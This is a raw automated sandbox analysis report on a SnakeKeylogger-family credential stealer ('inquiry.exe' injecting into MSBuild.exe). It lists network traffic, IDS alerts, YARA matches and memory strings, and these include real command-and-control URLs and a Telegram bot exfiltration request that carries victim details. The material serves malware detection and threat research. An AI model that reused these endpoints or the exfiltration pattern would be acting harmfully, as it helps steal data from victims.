Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49710 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 188.114.96.3:443

Source: unknown

FTP traffic detected: 192.64.117.204:21 -> 192.168.2.7:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ftp.fastestpay.digital

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 25 Sep 2024 16:50:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.fastestpay.digital
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.15.dr	String found in binary or memory: http://upx.sf.net
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: MSBuild.exe, 0000000A.00000002.3761177777.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACC04671	2_2_00007FFAACC04671
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACC0BF51	2_2_00007FFAACC0BF51
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACC091B0	2_2_00007FFAACC091B0
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACC14B24	2_2_00007FFAACC14B24
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACC044A0	2_2_00007FFAACC044A0
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACC033D0	2_2_00007FFAACC033D0
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACCD0001	2_2_00007FFAACCD0001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103C1A7	10_2_0103C1A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103D284	10_2_0103D284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103C477	10_2_0103C477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103C73E	10_2_0103C73E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010369A0	10_2_010369A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01033AA1	10_2_01033AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01039DE0	10_2_01039DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103EC18	10_2_0103EC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103CCE7	10_2_0103CCE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103CFB7	10_2_0103CFB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01036FC8	10_2_01036FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01033E09	10_2_01033E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01035381	10_2_01035381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103F7F1	10_2_0103F7F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010339EE	10_2_010339EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010329EC	10_2_010329EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103CA19	10_2_0103CA19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103EC17	10_2_0103EC17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103FC48	10_2_0103FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C97B0	10_2_054C97B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C9ED8	10_2_054C9ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C5290	10_2_054C5290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CED60	10_2_054CED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C2970	10_2_054C2970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CED70	10_2_054CED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CE918	10_2_054CE918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CE917	10_2_054CE917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CF1C8	10_2_054CF1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C8DF9	10_2_054C8DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C9590	10_2_054C9590
